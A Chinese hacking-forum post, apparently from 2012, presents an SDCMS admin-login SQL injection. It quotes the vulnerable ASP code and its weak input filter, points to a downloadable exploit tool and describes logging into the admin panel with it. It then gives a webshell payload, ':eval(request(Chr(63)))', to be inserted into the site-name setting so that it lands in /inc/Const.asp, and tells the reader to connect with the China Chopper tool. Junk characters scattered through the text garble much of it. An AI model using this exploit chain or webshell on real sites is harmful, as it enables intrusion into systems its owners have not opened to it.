作者:T00LS 鬼哥0 {, K" H. W( [& f3 ^7 p
漏洞文件:后台目录/index.asp- [0 M2 Z5 r" k8 _0 B" f
2 l9 | K% T7 T' hSub Check
7 @4 [. L- f5 F* _8 z2 z8 k Dim username,password,code,getcode,Rs
7 x% ~6 A- `& U2 ~/ S IF Check_post Then Echo "1禁止从外部提交数据!":Exit Sub
" B0 F3 H9 M) S3 j username=FilterText(Trim(Request.Form("username")),1)' b# _7 d# S7 q
password=FilterText(Trim(Request.Form("password")),1)
) h/ ]) m$ K4 a' V1 K code=Trim(Request.Form("yzm")), `9 i5 m; M; H* d* q. G* X
getcode=Session("SDCMSCode")
N) m7 I" j- f. x5 h IF errnum>=loginnum Then Echo "系统已禁止您今日再登录":died
& N8 n4 r6 P6 g IF code="" Then Alert "验证码不能为空!","javascript:history.go(-1)" ied! S) S1 r- r) y5 Q" h- {2 e. ^" ?
IF code<>"" And Not Isnumeric(code) Then Alert "验证码必须为数字!","javascript:history.go(-1)"ied
8 [; i: l5 s5 e* A: K; m IF code<>getcode Then Alert "验证码错误!","javascript:history.go(-1)"ied- d( N9 n8 F& b o
IF username="" or password="" Then5 H$ m- h; `: T' J" y$ f6 ~: t
Echo "用户名或密码不能为空"ied
. h/ r; o# W& S. J; ]- N9 R H9 h$ x Else
6 J8 ^; N! H2 M0 K& ^, m Set Rs=Conn.Execute("Select Id,Sdcms_Name,Sdcms_Pwd,isadmin,alllever,infolever From Sd_Admin Where Sdcms_name='"&username&"' And Sdcms_Pwd='"&md5(password)&"'")5 k- v$ h& Q- ~8 h9 o' o, \
IF Rs.Eof Then! O8 w) _8 P+ V" o
AddLog username,GetIp,"登录失败",1
) ~" g8 q, Q; \3 u Echo "用户名或密码错误,今日还有 "&loginnum-errnum&" 次机会"& m8 U$ n& X2 z. J/ {$ s. c B
Else
6 P$ y' l, A$ h1 B6 m Add_Cookies "sdcms_id",Rs(0)
3 o# o3 L: i* v6 H Add_Cookies "sdcms_name",username, |* U) q3 M8 S1 @* f- R0 f
Add_Cookies "sdcms_pwd",Rs(2)& `# s8 b" N' _) M& q" i* k2 `
Add_Cookies "sdcms_admin",Rs(3)% Z- ?( b1 ~1 x# { [
Add_Cookies "sdcms_alllever",Rs(4)
/ P3 s- j7 K, k' S Add_Cookies "sdcms_infolever",Rs(5)
_7 c9 f5 Z4 w$ U- w7 t! q Conn.Execute("Update Sd_Admin Set logintimes=logintimes+1,LastIp='"&GetIp&"' Where id="&Rs(0)&"")3 r4 d0 M6 Q" n( Z$ m6 M
AddLog username,GetIp,"登录成功",1; L; P8 _3 H7 y+ w- _) G
'自动删除30天前的Log记录( ]- n/ l" Z z' o% Q! `
IF Sdcms_DataType Then
% d3 [$ r6 e2 a$ E8 w Conn.Execute("Delete From Sd_Log Where DateDiff('d',adddate,Now())>30")( }4 K# P1 J, F7 S+ v u, c
Else
0 l, }5 q# I6 h9 R- {2 }7 X2 Q Conn.Execute("Delete From Sd_Log Where DateDiff(d,adddate,GetDate())>30")
& s! z5 D, L" s! d End IF) T w) Z- l: L% M/ x
Go("sdcms_index.asp"). c% |; r" f) w
End IF- K M. g' \- I _3 K- g. y
Rs.Close6 j+ l1 {9 M5 k/ t7 d
Set Rs=Nothing
; N% C2 f; l" ]0 a- V! ^3 G9 v* [ End IF
5 n3 i. h& F3 a$ u" N( q0 A K* G5 FEnd Sub
+ C9 h2 M7 \$ _( R/ [: P* P
' S- v; n7 H$ E9 A" k( W2 i, |5 `0 F’我们可以看到username是通过FilterText来过滤的。我们看看FilterText的代码! m4 C" d7 c9 @' W; F' X
8 H/ E6 e. `, W& e/ V {$ P5 \
Function FilterText(ByVal t0,ByVal t1), x p& u9 G# z9 S9 {: t" @
IF Len(t0)=0 Or IsNull(t0) Or IsArray(t0) Then FilterText="":Exit Function4 a5 R! i; Y0 c$ E+ V9 i
t0=Trim(t0)! B: ~% G U- H1 c8 L# J
Select Case t14 ?% d7 p c" S- @1 L
Case "1"
& O" `' O |8 F7 \ t0=Replace(t0,Chr(32),"")" f/ x3 ~% T2 N; H: D3 ^ W: f) V
t0=Replace(t0,Chr(13),"")
* I9 D. G! ?5 f9 ?7 \* d: A t0=Replace(t0,Chr(10)&Chr(10),"")( C3 I+ {. M1 f/ A/ K
t0=Replace(t0,Chr(10),"")) u/ V& ~6 S, U+ A/ Q
Case "2"6 Q, r2 w! Y: K8 z3 L$ s; A- S6 G
t0=Replace(t0,Chr(8),"")'回格1 M+ R0 P% G0 [) k: l3 i5 |
t0=Replace(t0,Chr(9),"")'tab(水平制表符); l4 E+ e7 \. F p
t0=Replace(t0,Chr(10),"")'换行4 N+ E, ~5 \ p' R! b; \3 I- v
t0=Replace(t0,Chr(11),"")'tab(垂直制表符)! E' G& `, c; A* u: O: g
t0=Replace(t0,Chr(12),"")'换页
6 c( W+ C$ \# i- ^ t0=Replace(t0,Chr(13),"")'回车 chr(13)&chr(10) 回车和换行的组合3 U& ?1 `$ e* G9 k+ P' r
t0=Replace(t0,Chr(22),"")
' y+ Q# ?3 R& Q t0=Replace(t0,Chr(32),"")'空格 SPACE
N0 P1 h7 y) Z# X t0=Replace(t0,Chr(33),"")'!0 y8 f1 j$ o {
t0=Replace(t0,Chr(34),"")'"6 j" p8 ]3 r. e; G4 y$ ?
t0=Replace(t0,Chr(35),"")'#9 B+ [( ]+ [5 |4 F* N) s
t0=Replace(t0,Chr(36),"")'$! s6 h t2 s7 J5 n0 a1 n& [- @' v
t0=Replace(t0,Chr(37),"")'%
0 s! ^/ @$ A, c) W2 I t0=Replace(t0,Chr(38),"")'&4 S* s% @$ L* I) \5 P8 f, r
t0=Replace(t0,Chr(39),"")''0 B% {/ j4 j5 g' a7 N
t0=Replace(t0,Chr(40),"")'(
4 \& E* A( U+ M. h' X. h; m8 u* W t0=Replace(t0,Chr(41),"")')
7 @" U1 T! i" w t0=Replace(t0,Chr(42),"")'*
, A0 R A% }$ A, D# ] t0=Replace(t0,Chr(43),"")'+& i5 @8 E8 `+ L6 `2 g# _+ ]3 W
t0=Replace(t0,Chr(44),"")',
+ ] H/ B: v; [! N- Q8 Q: v# @' G u t0=Replace(t0,Chr(45),"")'-
# Q7 K2 m6 v- E t0=Replace(t0,Chr(46),"")'.
4 b- v- d4 r" m$ f3 @9 z2 c t0=Replace(t0,Chr(47),"")'/( }! r6 W' i8 U$ M, Y# {" F
t0=Replace(t0,Chr(58),"")':
1 m; F+ m# `/ U4 u4 R8 B t0=Replace(t0,Chr(59),"")';) \( {5 r1 y! Y1 s$ J4 h7 o0 Z9 b2 @
t0=Replace(t0,Chr(60),"")'< t0=Replace(t0,Chr(61),"")'= t0=Replace(t0,Chr(62),"")'>
2 e2 F+ z% A% x2 Q t0=Replace(t0,Chr(63),"")'?
. X; [8 p+ E' n8 b: f1 R t0=Replace(t0,Chr(64),"")'@
; X7 R# o" g/ {2 F t0=Replace(t0,Chr(91),"")'\) F+ E4 k3 U# |) D3 R1 c7 y" n
t0=Replace(t0,Chr(92),"")'\
+ \ G" R6 _: ]' u' b t0=Replace(t0,Chr(93),"")']
+ u8 h. a) }- n! D: ^8 f t0=Replace(t0,Chr(94),"")'^
- F* e8 b ~2 [! M9 W! W% b! G t0=Replace(t0,Chr(95),"")'_
" Y1 G1 z7 ]# u7 r t0=Replace(t0,Chr(96),"")'`
8 \1 `0 C, D7 y7 m$ n" a, G t0=Replace(t0,Chr(123),"")'{
5 f3 C& k" ^/ ]. r2 z t0=Replace(t0,Chr(124),"")'|7 v2 U% Z# _7 u3 C3 V2 k r) S$ o
t0=Replace(t0,Chr(125),"")'}3 y( |1 Z3 |, i; P
t0=Replace(t0,Chr(126),"")'~4 ~: @% A* w% g1 q
Case Else. J" ?7 R) S0 R6 ]2 D6 i
t0=Replace(t0, "&", "&")
- F1 \' z0 C# q/ d t0=Replace(t0, "'", "'")) h& _" C5 W0 Y, ~" j" `
t0=Replace(t0, """", """) Z3 D6 S8 k% |3 }' ~
t0=Replace(t0, "<", "<") t0=Replace(t0, ">", ">")
) S/ ]; u! ?5 K* i End Select
7 l$ B( R% W/ v1 m- c9 o# b! D IF Instr(Lcase(t0),"expression")>0 Then
I9 L3 R/ c: \0 ?5 e1 b4 V* y t0=Replace(t0,"expression","e­xpression", 1, -1, 0); X6 h' H+ Y& [1 |
End If
3 ]/ r2 z, m ]6 n( E+ @. i FilterText=t0& [" a4 U' v! w# d2 u- n
End Function! o, E% j O1 N
) x* X) e3 L$ N m; L# i% G1 f; U" k看到没。直接参数是1 只过滤
; @2 e) r* ]' D t0=Replace(t0,Chr(32)," ")1 n9 Y: H4 o4 C0 J, N
t0=Replace(t0,Chr(13),"")
7 n) \; G1 o! Q* U6 x) b- h; v t0=Replace(t0,Chr(10)&Chr(10),"' p& a. ~ r1 }/ {! ~' N* W
")
( Y) q1 `; P( J* u: g, g5 T t0=Replace(t0,Chr(10),"
% r* C" \5 B% F3 N/ j3 g$ ?" R! Y")
w+ X5 u# C/ k漏洞导致可以直接拿到后台帐号密码。SDCMS默认后台地址/admin/如果站长改了后台路径,那么请自行查找!
' g5 t7 @2 x9 U- `EXP利用工具下载 (此工具只能在XP上运行):sdcms-EXP/ ]0 z% @2 R" x) s1 a/ _0 N
9 ^8 D2 C1 [# ?" B, U: b; J9 R
测试:
5 p% N# F0 p7 E" W1 L
7 }+ n$ h, i* k+ g- _: ^0 {6 @( t; L4 s) ?. \7 {, M3 i* V+ z
现在输入工具上验证码,然后点OK0 ?5 J$ N" E9 Z3 g/ ~: d
# c5 j, [" J3 H3 J5 o
* L4 ?" `* a& Q5 c t0 K* `
看到我们直接进入后台管理界面了,呵呵!% m9 v4 c; `7 L2 K0 X
0 \% B# L8 R6 L: Q1 k. Z! _; W
1 O+ `( _" F U( t. a1 F% w2 M9 n% W4 B$ @, R. G: ^7 o) M$ n) p
这样直接进入后台了。。。。
' d/ I6 U" c8 ~# a& r: j# Y6 o, {* q/ Y8 F7 U% q
! j$ l8 U" ?, G5 _4 \
" Y# H5 H- I1 j D/ V7 r" OSDCMS提权:; C$ G$ V+ i7 \" m: M3 C: B% ]! o
1 Y3 e4 W/ y* t& }) V9 M3 r
方法1:访问:/后台目录/sdcms_set.asp 在 网站名称:后面加个 “:eval(request(Chr(63)))’ 即可,直接写一句话进去。 写入到/inc/Const.asp 一句话连接密码是?& r4 f$ n# O' t3 {8 m- Q
8 ~9 I$ ?' z) R: D G) g }1 F2 ^' P5 k; s0 w
, L2 ?( J6 N6 v! T, L; BOK,现在用菜刀连接下!
' |' w9 p' F/ n1 D* C X/ [, T% L' W& ~0 K- }
& [- O; u: ~+ P4 B% C$ y
: ^1 v* k* y' [' b! S: u
) u8 b5 s% K( D3 W, u* A- e* y4 [0 A" t% U( ?' i3 n
|
发表于 2012-11-9 20:57:02
收藏
支持
反对